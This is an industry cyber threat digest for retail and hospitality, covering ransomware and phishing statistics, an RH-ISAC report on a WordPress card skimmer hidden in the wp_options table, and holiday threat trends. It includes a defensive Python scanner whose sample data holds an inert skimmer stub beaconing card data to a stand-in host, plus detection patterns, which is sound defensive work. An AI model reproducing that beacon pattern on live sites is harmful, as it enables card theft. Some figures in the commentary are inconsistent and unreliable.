The retail and hospitality industries face an intensifying array of cyber threats, with ransomware accounting for 30% of all reported incidents in 2024. These attacks have led to average operational downtimes of 72 hours and recovery costs reaching USD 1.4 million per incident. Phishing campaigns targeting customer data have increased by 22% year-over-year, while third-party supply chain breaches represent 41% of reported incidents. The impact extends to cryptocurrency fraud, with businesses reporting USD 450,000 in losses per incident. ReliaQuest's report emphasises the need for a defense-in-depth strategy, highlighting how intelligence-driven solutions and automation can significantly improve threat detection and response times. The findings underscore the critical importance of industry collaboration through organisations like RH-ISAC, particularly as cyber threats continue to evolve and target the sector's growing digital infrastructure.
IADS Notes: Recent cyber incidents underscore the report's findings about retail sector vulnerabilities. In March 2025, a single security update failure caused USD 5.4 billion in losses, while December 2024 saw a ransomware attack disrupting over 3,000 retailers' operations. The sophistication of threats is evident in January 2025 data showing 90% of successful cyberattacks begin with phishing, and the discovery of advanced card skimming malware targeting payment systems. El Corte Inglés's recent data breach through an external provider further demonstrates the critical importance of comprehensive security protocols and rapid incident response capabilities.
KasadaIQ Insights: Refund Fraud

RH-ISAC: Sophisticated card skimmer targets WordPress checkout pages via database injection
What: Security researchers have identified a new malware variant that compromises WordPress e-commerce sites through database manipulation, capturing credit card data during checkout while circumventing standard security protocols.
Why it is important: The emergence of this sophisticated malware highlights a critical vulnerability in retail payment infrastructure at a time when digital transactions represent 70% of global sales, threatening both merchant operations and customer trust.
A sophisticated credit card skimming malware, designated as malware.magento_shoplift.273, has emerged as a significant threat to WordPress-based e-commerce sites. The malware employs an innovative approach by injecting malicious JavaScript directly into the website's database, specifically targeting the wp_options table's widget_block entry. This method allows it to evade traditional security measures that focus on file-based malware detection.
The skimmer activates exclusively on checkout pages, either by hijacking legitimate payment fields or creating convincing fake credit card forms to capture sensitive data. The stolen information, including credit card numbers, CVV codes, and billing details, undergoes Base64 encoding and AES-CBC encryption before being transmitted to attacker-controlled domains. The malware's sophisticated design enables it to operate stealthily, using the navigator.sendBeacon function to exfiltrate data without disrupting normal user activity. This development presents a particular challenge for retail and hospitality sectors, where e-commerce platforms are crucial for daily operations.
IADS Notes: The discovery of this sophisticated card skimmer represents a concerning evolution in retail cybersecurity threats. In December 2024, Stripe blocked nearly 21 million fraudulent transactions worth USD 917 million during just one weekend, highlighting the scale of payment security challenges. The skimmer's technique mirrors the June 2024 Neiman Marcus breach, where attackers compromised cloud databases to access customer data. With mobile transactions now accounting for 70% of global sales, this threat is particularly significant for retailers navigating digital transformation while maintaining security.
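A defender-side check for the injection point described above, as an added example that is not from RH-ISAC or the original report: it scans exported wp_options rows for script tags in the widget_block entry and scores them against the behaviours the summary lists. The sample rows, host names and the inert stub are constructed, and the scoring thresholds are an assumption.

```python
import re
from urllib.parse import urlparse

# Behaviours named in the summary: checkout-only activation, Base64 encoding,
# AES-CBC encryption and exfiltration through navigator.sendBeacon.
INDICATORS = {
    "checkout_gate": re.compile(r"checkout", re.I),
    "send_beacon": re.compile(r"navigator\s*\.\s*sendBeacon", re.I),
    "base64": re.compile(r"\b(?:btoa|atob)\s*\(", re.I),
    "aes_cbc": re.compile(r"AES-CBC", re.I),
}
SCRIPT_RE = re.compile(r"<script\b[^>]*>.*?</script\s*>", re.I | re.S)
URL_RE = re.compile(r"https?://[^\s\"'\\)<>]+", re.I)


def widget_block_value(html):
    """Wrap HTML in the PHP-serialized array shape WordPress uses for block widgets."""
    return 'a:2:{i:2;a:1:{s:7:"content";s:%d:"%s";}s:12:"_multiwidget";i:1;}' % (
        len(html.encode("utf-8")), html)


def external_hosts(script, allowed_hosts):
    """Return hosts referenced by the script that are not the shop's own."""
    hosts = set()
    for url in URL_RE.findall(script):
        host = (urlparse(url).hostname or "").lower()
        if host and not any(host == a or host.endswith("." + a) for a in allowed_hosts):
            hosts.add(host)
    return sorted(hosts)


def scan_options(rows, allowed_hosts):
    """rows: iterable of (site, option_name, option_value) from a wp_options export."""
    findings = []
    for site, name, value in rows:
        if name != "widget_block":
            continue
        for match in SCRIPT_RE.finditer(value):
            script = match.group(0)
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(script))
            hosts = external_hosts(script, allowed_hosts)
            # Assumed threshold: beaconing to an unknown host, or three or more
            # indicators together, is treated as high; any other script is reviewed.
            high = ("send_beacon" in hits and bool(hosts)) or len(hits) >= 3
            findings.append({"site": site, "verdict": "high" if high else "review",
                             "indicators": hits, "hosts": hosts})
    return findings


# Constructed sample data: one ordinary block, one first-party script and one
# inert stub that only carries the indicator strings.
ALLOWED_HOSTS = {"shop.example.test"}
SKIMMER_STUB = ('<script>if(location.pathname.includes("checkout")){'
                '/* constructed inert stub: AES-CBC then base64 */'
                'navigator.sendBeacon("https://collector.example.invalid/c",btoa("x"));}'
                '</script>')
SAMPLE_ROWS = [
    ("site-a", "siteurl", "https://shop.example.test"),
    ("site-a", "widget_block",
     widget_block_value("<!-- wp:paragraph --><p>Sale</p><!-- /wp:paragraph -->")),
    ("site-b", "widget_block",
     widget_block_value('<script src="https://cdn.shop.example.test/banner.js"></script>')),
    ("site-c", "widget_block", widget_block_value(SKIMMER_STUB)),
]

if __name__ == "__main__":
    for finding in scan_options(SAMPLE_ROWS, ALLOWED_HOSTS):
        print(finding)
```

Because the check reads the database value rather than files on disk, it covers the gap the summary attributes to file-based malware scanning.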

RH-ISAC: Holiday season cyber threat trends 2024
What: RH-ISAC has released its Holiday season cyber threat trends 2024.
Why it is important: For the retail, hospitality, and travel community, the holiday season is the most intense time of year for consumers and cybersecurity professionals facing persistent threats. From the beginning of October through the end of December, cyber threats to organizations expand in both scale and intensity to match the rise in consumer traffic.
The key takeaways from member analysts provide critical insight into the active defensive trends in the retail sector. Social engineering and fraud remain critical concerns, with various types of fraud increasing dramatically in the current period. Organizations are seeing an increase in the prevalence of call-based social engineering, loyalty and gift card fraud, and DoS attacks.
